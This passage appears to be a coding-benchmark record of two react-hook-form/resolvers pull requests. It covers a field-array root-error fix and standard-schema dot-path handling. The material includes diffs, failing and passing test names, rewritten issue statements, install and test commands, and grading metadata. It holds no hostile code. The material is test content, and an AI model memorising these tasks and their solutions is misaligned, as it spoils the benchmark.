name: 'fieldArrayWithRootError' }, + }, + }, + fieldArrayWithoutRootError: [ + { + name: { + type: 'first', + message: 'first message', + ref: { name: 'fieldArrayWithoutRootError.0.name' }, + }, + }, + { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithoutRootError.1.name' }, + }, + }, + ], + }); +}); diff --git a/src/__tests__/toNestObject.ts b/src/__tests__/toNestObject.ts deleted file mode 100644 index e416e8b..0000000 --- a/src/__tests__/toNestObject.ts +++ /dev/null @@ -1,40 +0,0 @@ -import { Field, FieldError, InternalFieldName } from 'react-hook-form'; -import { toNestError } from '../toNestError'; - -const flatObject: Record<string, FieldError> = { - name: { type: 'st', message: 'first message' }, - 'test.0.name': { type: 'nd', message: 'second message' }, -}; - -const fields = { - name: { - ref: { - reportValidity: vi.fn(), - setCustomValidity: vi.fn(), - }, - }, - unused: { - ref: { name: 'unusedRef' }, - 
}, -} as any as Record<InternalFieldName, Field['_f']>; - -test('transforms flat object to nested object', () => { - expect( - toNestError(flatObject, { fields, shouldUseNativeValidation: false }), - ).toMatchSnapshot(); -}); - -test('transforms flat object to nested object and shouldUseNativeValidation: true', () => { - expect( - toNestError(flatObject, { fields, shouldUseNativeValidation: true }), - ).toMatchSnapshot(); - expect( - (fields.name.ref as HTMLInputElement).reportValidity, - ).toHaveBeenCalledTimes(1); - expect( - (fields.name.ref as HTMLInputElement).setCustomValidity, - ).toHaveBeenCalledTimes(1); - expect( - (fields.name.ref as HTMLInputElement).setCustomValidity, - ).toHaveBeenCalledWith(flatObject.name.message); -});
[ "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array" ]
[ "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > 
joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when 
validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass" ]
Function: toNestErrors<TFieldValues extends FieldValues>(errors: FieldErrors, options: ResolverOptions<TFieldValues>) Location: src/toNestErrors.ts Inputs: - **errors**: `FieldErrors` – a flat record where keys are field paths (e.g., `"name"` or `"fieldArray.0.name"`) and values are `FieldError` objects containing at least `{ type: string, message: string }`. - **options**: `ResolverOptions<TFieldValues>` – includes: - `fields`: map of internal field names to field metadata (`Field['_f']`) used to attach the original `ref` to each error. - `names` (optional): array of field names (including field array entries) used to detect root errors for field arrays. - `shouldUseNativeValidation`: boolean flag that, when true, triggers native browser validation via `validateFieldsNatively`. Outputs: - Returns `FieldErrors<TFieldValues>` – a nested error object where dot‑notation paths are transformed into nested structures. For field arrays, if a field name appears in `options.names`, a `root` property containing the error for the array itself is added alongside indexed item errors. Description: Converts a flat errors map produced by a resolver into the nested structure expected by React Hook Form, preserving element references and handling root errors for field arrays when applicable. Use it within custom resolvers or when testing error transformation logic.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 19, "num_modified_lines": 166, "pr_author": "jorisre", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding root error support for field arrays, and the test suite verifies this behavior with a new snapshot test. The provided code updates replace the old toNestError with a new toNestErrors implementation that handles root errors, and all imports are updated accordingly, matching the test expectations. No mismatches, missing specs, or external dependencies are observed, making the task well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, 
"test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6f1b139cfe34d5c18d07b5201dec427aa3607e3c
2023-12-29 19:32:41
react-hook-form__resolvers-656
diff --git a/src/toNestErrors.ts b/src/toNestErrors.ts index 5c4b839..e68d3d3 100644 --- a/src/toNestErrors.ts +++ b/src/toNestErrors.ts @@ -23,10 +23,7 @@ export const toNestErrors = <TFieldValues extends FieldValues>( }); if (isNameInFieldArray(options.names || Object.keys(errors), path)) { - const fieldArrayErrors = Object.assign( - {}, - compact(get(fieldErrors, path)), - ); + const fieldArrayErrors = Object.assign({}, get(fieldErrors, path)); set(fieldArrayErrors, 'root', error); set(fieldErrors, path, fieldArrayErrors); @@ -38,9 +35,6 @@ export const toNestErrors = <TFieldValues extends FieldValues>( return fieldErrors; }; -const compact = <TValue>(value: TValue[]) => - Array.isArray(value) ? value.filter(Boolean) : []; - const isNameInFieldArray = ( names: InternalFieldName[], name: InternalFieldName,
Fixes error handling for array errors with root error Fixes https://github.com/react-hook-form/resolvers/issues/629 Issue: If you had a field array with two elements and an error in the second element THEN a root error, `.compact` would recognize the second element error as an error in the first element. Solution: Get rid of `.compact`
**Title** Correct handling of array element errors when a root error is present **Problem** When a field array contains an error on a later element and a separate root‑level error, the error‑mapping logic mistakenly attributes the later element’s error to the first element. This results in inaccurate error displays for users interacting with dynamic forms. **Root Cause** The error aggregation process removed falsy entries from the array of element errors, causing the index positions to shift and the subsequent root error to be merged with the wrong array entry. **Fix / Expected Behavior** - Preserve the original order and length of element error arrays instead of filtering out empty entries. - Attach the root error alongside the element errors without altering their indices. - Ensure that each array element’s error remains correctly associated with its corresponding field. - Maintain existing error handling for non‑array fields unchanged. **Risk & Validation** - Verify that forms with mixed element and root errors now report each error on the correct field. - Run the resolver’s test suite, focusing on field array scenarios, to confirm no regression in other error paths. - Perform manual testing of dynamic field arrays with varying numbers of entries to ensure error alignment remains consistent.
656
react-hook-form/resolvers
diff --git a/src/__tests__/toNestErrors.ts b/src/__tests__/toNestErrors.ts index 6ac0df6..983fdde 100644 --- a/src/__tests__/toNestErrors.ts +++ b/src/__tests__/toNestErrors.ts @@ -204,3 +204,54 @@ test('transforms flat object to nested object with root error for field array', ], }); }); + +test('ensures consistent ordering when a field array has a root error and an error in the non-first element', () => { + const result = toNestErrors( + { + 'fieldArrayWithRootError.1.name': { + type: 'second', + message: 'second message', + }, + fieldArrayWithRootError: { type: 'root-error', message: 'root message' }, + }, + { + fields: { + fieldArrayWithRootError: { + name: 'fieldArrayWithRootError', + ref: { name: 'fieldArrayWithRootError' }, + }, + 'fieldArrayWithRootError.0.name': { + name: 'fieldArrayWithRootError.0.name', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + 'fieldArrayWithRootError.1.name': { + name: 'fieldArrayWithRootError.1.name', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + names: [ + 'fieldArrayWithRootError', + 'fieldArrayWithRootError.0.name', + 'fieldArrayWithRootError.1.name', + ], + shouldUseNativeValidation: false, + }, + ); + + expect(result).toEqual({ + fieldArrayWithRootError: { + '1': { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + root: { + type: 'root-error', + message: 'root message', + ref: { name: 'fieldArrayWithRootError' }, + }, + }, + }); +});
[ "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element" ]
[ "src/__tests__/validateFieldsNatively.ts > validates natively fields", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the 
errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants", "valibot/src/__tests__/valibot.ts > valibotResolver > should exit issue resolution if no path is set", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", 
"class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "joi/src/__tests__/Form.tsx > form's validation with Joi and 
TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", 
"zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", 
"class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", 
"io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typebox/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation 
fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv" ]
Function: toNestErrors<TFieldValues extends FieldValues>(flatErrors: Record<string, { type: string; message: string }>, options: { fields: Record<string, { name: string; ref: { name: string } }>; names: InternalFieldName[]; shouldUseNativeValidation: boolean }) Location: src/toNestErrors.ts Inputs: - **flatErrors** – a flat error map where keys are field names (e.g., `"fieldArray.1.name"`) and values contain at least `type` and `message`. - **options** – an object containing: - **fields** – a registry of all registered fields, keyed by their internal names, each providing `name` and a reference object (`ref`) used for attaching the original field reference to the resulting nested error. - **names** – the list of internal field names used to decide whether a key belongs to a field array. - **shouldUseNativeValidation** – flag that currently does not affect the nesting logic but is part of the public signature. Outputs: - Returns a nested error object mirroring the structure of the form data. For field arrays it creates a sub‑object keyed by array index, places non‑first‑element errors under their index, and always adds a `root` property for errors that target the array itself. - Each leaf error include the original `type`, `message`, and a `ref` property pointing to the corresponding field’s reference. Description: Converts a flat error map (as produced by resolver libraries) into a deeply nested error structure suitable for React Hook Form’s `formState.errors`. It now preserves ordering for field arrays with a root error by directly assigning array‑level errors without filtering falsy values.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "SangJunBak", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/react-hook-form/resolvers/issues/629" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue describes a mis‑behaviour when a field array has a root error and a non‑first element error, and proposes to remove the `.compact` call. The added test asserts the correct nesting and ordering, matching the described fix. No test‑suite coupling, hidden naming expectations, external dependencies, ambiguous specs, patch artifacts, or implicit domain knowledge are present. Therefore the task is well‑specified and directly aligned with the tests, qualifying as a solvable (A) task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8ea953c84da3ae6a56858b4980fff6df700f8914
2025-02-21 16:09:35
react-hook-form__resolvers-746
diff --git a/bun.lock b/bun.lock index b6d9c48..53d1226 100644 --- a/bun.lock +++ b/bun.lock @@ -9,6 +9,7 @@ "devDependencies": { "@sinclair/typebox": "^0.34.15", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@testing-library/dom": "^10.4.0", "@testing-library/jest-dom": "^6.6.3", "@testing-library/react": "^16.2.0", @@ -412,6 +413,8 @@ "@standard-schema/spec": ["@standard-schema/spec@1.0.0", "", {}, "sha512-m2bOd0f2RT9k8QJx1JN85cZYyH1RqFBdlwtkSlf4tBDYLCiiZnv1fIIwacK6cqwXavOydf0NPToMQgpKq+dVlA=="], + "@standard-schema/utils": ["@standard-schema/utils@0.3.0", "", {}, "sha512-e7Mew686owMaPJVNNLs55PUvgz371nKgwsc4vxE49zsODpJEnxgxRo2y/OKrqueavXgZNMDVj3DdHFlaSAeU8g=="], + "@surma/rollup-plugin-off-main-thread": ["@surma/rollup-plugin-off-main-thread@2.2.3", "", { "dependencies": { "ejs": "^3.1.6", "json5": "^2.2.0", "magic-string": "^0.25.0", "string.prototype.matchall": "^4.0.6" } }, "sha512-lR8q/9W7hZpMWweNiAKU7NQerBnzQQLvi8qnTDU/fxItPhtZVMbPV3lbCwjhIlNBe9Bbr5V+KHshvWmVSG9cxQ=="], "@testing-library/dom": ["@testing-library/dom@10.4.0", "", { "dependencies": { "@babel/code-frame": "^7.10.4", "@babel/runtime": "^7.12.5", "@types/aria-query": "^5.0.1", "aria-query": "5.3.0", "chalk": "^4.1.0", "dom-accessibility-api": "^0.5.9", "lz-string": "^1.5.0", "pretty-format": "^27.0.2" } }, "sha512-pemlzrSESWbdAloYml3bAJMEfNh1Z7EduzqPKprCH5S341frlpYnUEW0H72dLxa6IsYr+mPno20GiSm+h9dEdQ=="], diff --git a/package.json b/package.json index 55b9500..9553d97 100644 --- a/package.json +++ b/package.json @@ -269,6 +269,7 @@ "devDependencies": { "@sinclair/typebox": "^0.34.15", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@testing-library/dom": "^10.4.0", "@testing-library/jest-dom": "^6.6.3", "@testing-library/react": "^16.2.0", diff --git a/standard-schema/package.json b/standard-schema/package.json index de255f3..b67ce00 100644 --- a/standard-schema/package.json +++ b/standard-schema/package.json @@ -13,6 +13,7 @@ 
"peerDependencies": { "react-hook-form": "^7.0.0", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@hookform/resolvers": "^2.0.0" } } diff --git a/standard-schema/src/standard-schema.ts b/standard-schema/src/standard-schema.ts index 979f640..8d216ba 100644 --- a/standard-schema/src/standard-schema.ts +++ b/standard-schema/src/standard-schema.ts @@ -1,5 +1,6 @@ import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { StandardSchemaV1 } from '@standard-schema/spec'; +import { getDotPath } from '@standard-schema/utils'; import { FieldError, FieldValues, Resolver } from 'react-hook-form'; function parseIssues( @@ -10,7 +11,7 @@ function parseIssues( for (let i = 0; i < issues.length; i++) { const error = issues[i]; - const path = error.path?.join('.'); + const path = getDotPath(error); if (path) { if (!errors[path]) { @@ -52,15 +53,14 @@ function parseIssues( * ``` */ export function standardSchemaResolver< - TFieldValues extends FieldValues, - Schema extends StandardSchemaV1<TFieldValues, any>, + Schema extends StandardSchemaV1<FieldValues>, >( schema: Schema, resolverOptions: { raw?: boolean; } = {}, -): Resolver<NonNullable<(typeof schema)['~standard']['types']>['output']> { - return async (values: TFieldValues, _, options) => { +): Resolver<StandardSchemaV1.InferOutput<Schema>> { + return async (values, _, options) => { let result = schema['~standard'].validate(values); if (result instanceof Promise) { result = await result;
fix(standard-schema): Propertly handle object path segments In StandardSchema issues, path segments can either be keys or an object with a `.key` value. Current handling just calls `path.join('.')`, which would result in `"object Object"` if any path segments are objects. The Standard Schema team have `@standard-schema/utils` which includes a `getDotPath` that handles segments correctly, so I've used that.
**Title** Properly resolve field paths for Standard Schema issues containing object segments **Problem** When the Standard Schema validator returns validation issues, the path information can be a mix of plain keys and objects with a `.key` property. The resolver previously concatenated path segments directly, which produced invalid identifiers like `"[object Object]"`. This caused errors to be attached to incorrect fields, breaking form error handling. **Root Cause** The resolver assumed every path segment was a string and used simple dot‑joining, ignoring the special object format used by Standard Schema. **Fix / Expected Behavior** - Introduce the official utility for constructing dot‑notation paths from mixed segments. - Update dependencies to include the utility package required for this logic. - Adjust type declarations to align with the standardized schema output inference. - Ensure that error objects are now keyed by the correctly generated dot paths. - Preserve existing resolver functionality while handling both string and object path segments. **Risk & Validation** - Verify that the new utility correctly transforms all possible path segment combinations. - Run the full test suite, especially tests exercising nested validation errors. - Confirm that the added dependency does not introduce version conflicts for downstream users.
746
react-hook-form/resolvers
